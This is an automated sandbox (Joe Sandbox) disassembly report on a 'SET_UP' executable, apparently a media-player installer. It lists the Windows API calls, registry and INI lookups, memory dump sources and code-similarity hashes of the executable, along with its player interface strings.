Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,%d.%d,?,00508FBC,00508FBC), ref: 004AF700
• lstrlenA.KERNEL32(?,?,%d.%d,?,00508FBC,00508FBC), ref: 004AF759
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: lstrlen
• String ID: %*.*f$%d.%d$I64
• API String ID: 1659193697-4138610494
• Opcode ID: 7b0b7e420e22e9f47ca79297d0adeea6d7a0140055b3eddb28af148e4e04f3c1
• Instruction ID: e57e6afcf036b60d09cb009b0a4bda74ef2f73d766fb5af7e0f192a24310846b
• Opcode Fuzzy Hash: 7b0b7e420e22e9f47ca79297d0adeea6d7a0140055b3eddb28af148e4e04f3c1
• Instruction Fuzzy Hash: C691097A800206ABDF24AEE8C4487AE77A0EB33314F54813BE84197355D73C9E4ACB5D

Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004C4DD3
                                                                                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,?,00000000,?,00000000,00000000,?,?,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004C4E2A
                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,00000000,?,?,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004C4E50
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004C4E61
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,00001000,?), ref: 004C4EBB
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: QueryValue$CloseH_prologPrivateProfileString
• String ID:
• API String ID: 1022837590-0
• Opcode ID: 890f54c9963bd3f36bdfd8edf906818878f132c89c75a713ade90e1da8b9f0c8
• Instruction ID: 602de37e93798daf2c5f2aebe3330b7f213d59b461b9d5859f77aaac0edc770f
• Opcode Fuzzy Hash: 890f54c9963bd3f36bdfd8edf906818878f132c89c75a713ade90e1da8b9f0c8
• Instruction Fuzzy Hash: 0231963180010AEBCF01EFA1DD54EEE7BB9FF84354F10452EF825A21A0DB389A11CB64

Control-flow Graph
control_flow_graph 387 4b60c0-4b60c9 call 4c4b7d 390 4b60cb-4b60f6 call 4c4950 GetCurrentThreadId SetWindowsHookExW call 4c663d 387->390 391 4b611e 387->391 395 4b60fb-4b6101 390->395 396 4b610e-4b611d call 4c657b 395->396 397 4b6103-4b6108 call 4c4b7d 395->397 396->391 397->396
APIs
• GetCurrentThreadId.KERNEL32 ref: 004B60D3
• SetWindowsHookExW.USER32(000000FF,V,00000000,00000000), ref: 004B60E3
  • Part of subcall function 004C663D: __EH_prolog.LIBCMT ref: 004C6642
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CurrentH_prologHookThreadWindows
• String ID: V
• API String ID: 2183259885-315977766
• Opcode ID: 23d3b9e54676f83996ed479c1e5621e3b37fabd677f4a37a95da457c1b9251ed
• Instruction ID: 483421226c42cd39331651724eb57accc4a0929dd275def252d498380281669c
• Opcode Fuzzy Hash: 23d3b9e54676f83996ed479c1e5621e3b37fabd677f4a37a95da457c1b9251ed
• Instruction Fuzzy Hash: A0F0E5359002546BD7A03BB5AA1EF4E3AE0AF40758F12076FF452461E2DB6C9C818B7D

Control-flow Graph
control_flow_graph 402 4c4d62-4c4d6c 403 4c4d6e-4c4d7a call 4c4d1c 402->403 404 4c4db4-4c4dc3 GetPrivateProfileIntW 402->404 408 4c4d7c-4c4d7f 403->408 409 4c4d81-4c4dad RegQueryValueExW RegCloseKey 403->409 406 4c4dc9-4c4dcb 404->406 408->406 409->408 410 4c4daf-4c4db2 409->410 410->406
APIs
• RegQueryValueExW.KERNEL32(00000000,?,00000000,?,?,?,00000001,?,?,?,?,?,0042AE61,Settings,LastLicenseCheck,00000000), ref: 004C4D9B
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,0042AE61,Settings,LastLicenseCheck,00000000,?), ref: 004C4DA4
• GetPrivateProfileIntW.KERNEL32(?,?,00000000,?), ref: 004C4DC3
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: ClosePrivateProfileQueryValue
• String ID:
• API String ID: 1423431592-0
• Opcode ID: 38f8383a8a9d03accd2a64d70832a72db64547696999f9c0d3a20f49f279e6e7
• Instruction ID: d6eda2c40e48f856a27438315e8cedb68e843239a128d19e8e4793b8995be007
• Opcode Fuzzy Hash: 38f8383a8a9d03accd2a64d70832a72db64547696999f9c0d3a20f49f279e6e7
• Instruction Fuzzy Hash: 0901697A000118FBCB52AF91CD08FEE3BB8EF84754F14806AF9069A220D775DA119B98

Control-flow Graph
control_flow_graph 411 40e4c9-40e50c __EH_prolog 413 40e51b-40e51d 411->413 414 40e50e-40e519 SHGetMalloc 411->414 415 40e521-40e539 413->415 414->415 416 40e548-40e54a 415->416 417 40e53b-40e546 SHGetDesktopFolder 415->417 418 40e54e-40e562 416->418 417->418
APIs
• __EH_prolog.LIBCMT ref: 0040E4EE
• SHGetMalloc.SHELL32(005091E4), ref: 0040E513
• SHGetDesktopFolder.SHELL32(005091E0,?,?,?,0040E4C4), ref: 0040E540
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: DesktopFolderH_prologMalloc
• String ID:
• API String ID: 1185184967-0
• Opcode ID: 7c6774bf56f55644354cec19d0202667bb12322a91eee66d1bd5cc16f86ffcdb
• Instruction ID: acb4fdbae04ce6963c1efbc4ad10392ea740e61a453946996517807afc7a703e
• Opcode Fuzzy Hash: 7c6774bf56f55644354cec19d0202667bb12322a91eee66d1bd5cc16f86ffcdb
• Instruction Fuzzy Hash: 58011270A01205EFD714CF95D909BADBBB4FB44308F10486FE802E7391E7789A04DB55
APIs
  • Part of subcall function 004C4C88: RegOpenKeyExW.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4CB6
  • Part of subcall function 004C4C88: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CD9
  • Part of subcall function 004C4C88: RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,0002001F,00000000,?,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CF8
  • Part of subcall function 004C4C88: RegCloseKey.KERNEL32(?,?,?,00508FBC,AppFolder,00000000), ref: 004C4D08
  • Part of subcall function 004C4C88: RegCloseKey.ADVAPI32(00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4D12
• RegCreateKeyExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,0002001F,00000000,?,00000000,00000000,?,?,?,?,004C4DF9,?), ref: 004C4D4C
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,004C4DF9,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004C4D53
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreate$Open
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1740278721-0
                                                                                                                                                                                                  • Opcode ID: c2e5d141f4b703238b6c40c8fda7588562b6c597f8b38eec626e6eb66be04ca5
                                                                                                                                                                                                  • Instruction ID: fd1377667621bea06dfd21276b55ea688d95ce3a24ee0253d493979c4ed27f4b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2e5d141f4b703238b6c40c8fda7588562b6c597f8b38eec626e6eb66be04ca5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FEE0397A501138BB8761AB96DD49DEFBE7CEA8ABA0700042AF60692110D6B49A0196F5
APIs
• SetErrorMode.KERNEL32(00000000,00000000,004B9162,00000000,00000000,00000000,00000000,?,00000000,?,004AEEBC,00000000,00000000,00000000,00000000,0049689D), ref: 004C73A5
• SetErrorMode.KERNEL32(00000000,?,00000000,?,004AEEBC,00000000,00000000,00000000,00000000,0049689D,00000000), ref: 004C73AC
  • Part of subcall function 004C73FF: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 004C7430
  • Part of subcall function 004C73FF: lstrcpyW.KERNEL32(?,.HLP,?,?,00000104), ref: 004C74D1
  • Part of subcall function 004C73FF: lstrcatW.KERNEL32(?,.INI,?,?,00000104), ref: 004C7500
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
• String ID:
• API String ID: 3389432936-0
• Opcode ID: 02f85a12755a416dc85cb58aca855219e64937adaae4eea7fcb4734b39baf815
• Instruction ID: 8af0d8b2e8d8073a4d3aa4f2aeae798fb02dcbef2405be9052260aa62c299d9c
• Opcode Fuzzy Hash: 02f85a12755a416dc85cb58aca855219e64937adaae4eea7fcb4734b39baf815
• Instruction Fuzzy Hash: CCF037789082558FC794EF25D554F097BE8AF84754F05848FF8449B3A2CB78E844CF6A
APIs
• HeapCreate.KERNEL32(00000000,00001000,00000000,0049681C,00000001), ref: 0049CB76
  • Part of subcall function 0049CA1D: GetVersionExA.KERNEL32 ref: 0049CA3C
• HeapDestroy.KERNEL32 ref: 0049CBB5
  • Part of subcall function 0049E08E: HeapAlloc.KERNEL32(00000000,00000140,0049CB9E,000003F8), ref: 0049E09B
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Heap$AllocCreateDestroyVersion
• String ID:
• API String ID: 2507506473-0
• Opcode ID: d03763853755309f0d979c1ccac85f62b1189c4e93f3f343c03d8149be08113e
• Instruction ID: b9edfe78dae0fa3f6f93bab27f37ec7c79e0b6b211da0e9eb466344dd15e5612
• Opcode Fuzzy Hash: d03763853755309f0d979c1ccac85f62b1189c4e93f3f343c03d8149be08113e
• Instruction Fuzzy Hash: F4F065715112019EFF6057327CC7B2A3DD0DB10795F14443BF801C81A0EB689581AA1A
APIs
• RtlAllocateHeap.NTDLL(00000000,004A9904,?,00000000,00000000,004A9913,004A9913), ref: 004977A2
  • Part of subcall function 0049D76C: InitializeCriticalSection.KERNEL32(00000000,?,00000010,?,00497754,00000009,?,00000000,00000000,004A9913,004A9913), ref: 0049D7A9
  • Part of subcall function 0049D76C: EnterCriticalSection.KERNEL32(00000010,00000010,?,00497754,00000009,?,00000000,00000000,004A9913,004A9913), ref: 0049D7C4
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CriticalSection$AllocateEnterHeapInitialize
• String ID:
• API String ID: 1616793339-0
• Opcode ID: 8cfece397398f5776d33151e9be530b641715a4dc6b8d27c9a0ee179655a1170
• Instruction ID: 548e3b7e72a1138b5e9d1c2b891fa814a6e6cdaebae99fe7ff0fd23a6f1b2147
• Opcode Fuzzy Hash: 8cfece397398f5776d33151e9be530b641715a4dc6b8d27c9a0ee179655a1170
• Instruction Fuzzy Hash: ED21F932A14204ABDF10EBA5DC82B9E7F64EB00724F204577F420EB2D0D37CB9418B58
APIs
• SHGetSpecialFolderPathW.SHELL32(00000000,?,0000000E,?), ref: 0041D431
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: FolderPathSpecial
• String ID:
• API String ID: 994120019-0
• Opcode ID: 7742ca1b486bdb4c1cd171e8c9213271b72619ced26e87ec3fd433ed33ddbeb0
• Instruction ID: 3da9f04a560dc41ff8ae94c2b426a7643f5e2dfca03e099d056c50adbb0303af
• Opcode Fuzzy Hash: 7742ca1b486bdb4c1cd171e8c9213271b72619ced26e87ec3fd433ed33ddbeb0
• Instruction Fuzzy Hash: C7F0307954010CBADB50DB69C9059D977B9BF88304F00C4B5AA45E7250EA70DA498B94
APIs
  • Part of subcall function 0041D612: GetVersionExW.KERNEL32(?), ref: 0041D641
  • Part of subcall function 0040122B: CreateFontIndirectW.GDI32(?), ref: 00401248
  • Part of subcall function 0040122B: CreateFontIndirectW.GDI32(?), ref: 0040125E
  • Part of subcall function 0040122B: CreateFontIndirectW.GDI32(?), ref: 0040127B
  • Part of subcall function 0040122B: CreateFontIndirectW.GDI32(?), ref: 0040129F
• LoadCursorW.USER32(?,00000191), ref: 004011F6
  • Part of subcall function 0041B548: RegOpenKeyExW.KERNEL32(80000002,Software\Apple Computer, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B570
  • Part of subcall function 0041B548: RegOpenKeyExW.KERNEL32(80000001,Software\Apple Computer, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B583
  • Part of subcall function 0041B548: RegOpenKeyExW.KERNEL32(80000002,Software\Apple, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B59B
  • Part of subcall function 0041B548: RegOpenKeyExW.KERNEL32(80000001,Software\Apple, Inc.\iTunes,00000000,00020019,00000000), ref: 0041B5AE
  • Part of subcall function 0041B548: RegCloseKey.ADVAPI32(00000000), ref: 0041B5B7
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CreateFontIndirectOpen$CloseCursorLoadVersion
• String ID:
• API String ID: 2066343201-0
APIs
• __EH_prolog.LIBCMT ref: 00404DAC
  • Part of subcall function 004B051D: ImageList_Create.COMCTL32(?,?,?,?,?), ref: 004B0532
• ImageList_AddMasked.COMCTL32(?,?,00FF00FF,00000084,?), ref: 00404E2D
• ImageList_AddMasked.COMCTL32(?,?,00FF00FF,000000CA), ref: 004053A3
  • Part of subcall function 004B0798: SendMessageW.USER32(?,00000432,00000000,?), ref: 004B07DB
  • Part of subcall function 0041787A: ImageList_GetImageInfo.COMCTL32(?,00000000,?), ref: 004178A9
Similarity
• API ID: Image$List_$Masked$CreateH_prologInfoMessageSend
• String ID: $<L$<L$Fit Window/Original size$Full screen (Alt+Enter)$Go to display view (F6)$Mute/Unmute (F8)$Next (Ctrl+F)$Play/Pause (Ctrl+P)$Previous (Ctrl+B)$Stop (Ctrl+S)$Toggle between elapsed and remaining time$VGL$Volume
• API String ID: 1830684457-1735526441
APIs
• __EH_prolog.LIBCMT ref: 00421912
  • Part of subcall function 00420A8D: __EH_prolog.LIBCMT ref: 00420A92
  • Part of subcall function 00420A8D: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000001,00000000,?,?,?,Software\Classes\CLSID\%s,?), ref: 00420ACD
• GetTickCount.KERNEL32 ref: 00421941
Strings
• Software\Classes\CLSID\%s, xrefs: 00421A57
Similarity
• API ID: H_prolog$CountCreateTick
• String ID: Software\Classes\CLSID\%s
• API String ID: 984754323-3302616724
APIs
• __EH_prolog.LIBCMT ref: 004B09FA
• GetKeyState.USER32(00000001), ref: 004B0A47
• GetKeyState.USER32(00000002), ref: 004B0A54
• GetKeyState.USER32(00000004), ref: 004B0A61
• GetParent.USER32(?), ref: 004B0A82
• SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004B0B5C
• SendMessageW.USER32(?,00000435,00000000,?), ref: 004B0BA0
• SendMessageW.USER32(?,00000432,00000000,00000028), ref: 004B0BB8
• ScreenToClient.USER32(?,?), ref: 004B0BD4
• GetCursorPos.USER32(?), ref: 004B0C2B
• SendMessageW.USER32(?,00000412,00000000,?), ref: 004B0C49
• SendMessageW.USER32(?,00000432,00000000,00000028), ref: 004B0CAB
• SendMessageW.USER32(?,00000401,00000001,00000000), ref: 004B0CCE
• SendMessageW.USER32(?,00000411,00000001,00000028), ref: 004B0CEA
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 004B0CFD
• SendMessageW.USER32(?,00000433,00000000,00000138), ref: 004B0D29
• SendMessageW.USER32(?,00000401,00000000,00000000), ref: 004B0D77
• GetParent.USER32(?), ref: 004B0DA8
Similarity
• API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
• String ID: ($($@
• API String ID: 986702660-2846432479
                                                                                                                                                                                                  APIs
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CountH_prologTick
• String ID:
• API String ID: 2378785137-0
• Opcode ID: 4caa8e640146a5a0902d0a51bbf22612b8531f3e3a53185df817bbfc1fe7f88f
• Instruction ID: 044fa40d664d14d3b6a6feaa44f26e224bf9de6da753db9ab8a368b14a05259f
• Opcode Fuzzy Hash: 4caa8e640146a5a0902d0a51bbf22612b8531f3e3a53185df817bbfc1fe7f88f
• Instruction Fuzzy Hash: 9C022734600315ABDF28EF22D864EAB77A9EF90328F40C11FF955866D2DB38E945CB54
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: __ftol
• String ID:
• API String ID: 495808979-0
• Opcode ID: cd8494936c0b93d4fafc3c44230cec43537dc7ee4a877c549d486c6e4548aa36
• Instruction ID: 3dbdbb62e61c85d376fdd006057ac742b68d9e0cef9bc09d0545b0a1920cbc85
• Opcode Fuzzy Hash: cd8494936c0b93d4fafc3c44230cec43537dc7ee4a877c549d486c6e4548aa36
• Instruction Fuzzy Hash: 889276716083818FD324DF29C490A6BBBE5FFC9304F14892EF58A87362D7349959CB5A
APIs
• GetPropA.USER32(?,?), ref: 004ACCB5
• CallWindowProcA.USER32(00000000), ref: 004ACCD7
  • Part of subcall function 004AB9C0: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 004AB9E6
  • Part of subcall function 004AB9C0: RemovePropA.USER32(?,?), ref: 004AB9FE
  • Part of subcall function 004AB9C0: RemovePropA.USER32(?,?), ref: 004ABA0A
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Prop$CallProcRemoveWindow
• String ID: #32770
• API String ID: 2276450057-463685578
• Opcode ID: 18411c5c495311092754111d979d6b4eef68f50bfd53aa7fd9b2c3450815fe60
• Instruction ID: bac933c45dc9b58754653b4c78f86fe943070f91507bdf925fa2748824eaf7a2
• Opcode Fuzzy Hash: 18411c5c495311092754111d979d6b4eef68f50bfd53aa7fd9b2c3450815fe60
• Instruction Fuzzy Hash: 84812B367013047BD690AB51DCC4EAF7B5CEBA77A5F000827FA05C3291D76A9905C7BA
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID:
• String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$bzP$c$e
• API String ID: 0-1843565883
• Opcode ID: 062780a77a4c6da23b5abb2aaa1e30fd4fb397a2a22e82db805a765407336237
• Instruction ID: 22af979be3bccf1c1f05ddd3ec96d79b077dba454c91bbcbe497f09c617ea65e
• Opcode Fuzzy Hash: 062780a77a4c6da23b5abb2aaa1e30fd4fb397a2a22e82db805a765407336237
• Instruction Fuzzy Hash: 34E1CE71D45249EEEF24CA54C8453BE7BB0FB26304F28402FD801AA292DF7D8982DB1D
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: __ftol
• String ID:
• API String ID: 495808979-0
• Opcode ID: 635a1bd8e2d858e2610fd5987f1cd8533248737c4c332c7e7182ba5f7e40e3e0
• Instruction ID: 8fce3069de065d501a46c11720f19998de208dc45e4839d8d98e68e5a3c4da1d
• Opcode Fuzzy Hash: 635a1bd8e2d858e2610fd5987f1cd8533248737c4c332c7e7182ba5f7e40e3e0
• Instruction Fuzzy Hash: 6492567160C3828FD314CF15D4946ABBBE5FFC9304F058A6EE4CA92265D7349A29CB87
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,0000076C), ref: 00498583
• GetDriveTypeW.KERNEL32(00000000,?,?,0000076C), ref: 004985DF
• FileTimeToLocalFileTime.KERNEL32(?,?,?,0000076C), ref: 0049864E
• FileTimeToSystemTime.KERNEL32(?,-B,?,0000076C), ref: 00498664
• FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,0000076C), ref: 004986BA
• FileTimeToSystemTime.KERNEL32(?,-B,?,?,?,?,?,?,0000076C), ref: 004986D0
• FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000076C), ref: 00498728
• FileTimeToSystemTime.KERNEL32(?,-B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000076C), ref: 0049873E
• FindClose.KERNEL32(?), ref: 00498775
• GetLastError.KERNEL32(?,0000076C), ref: 004987B7
• FindClose.KERNEL32(?,?,0000076C), ref: 004987C7
Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
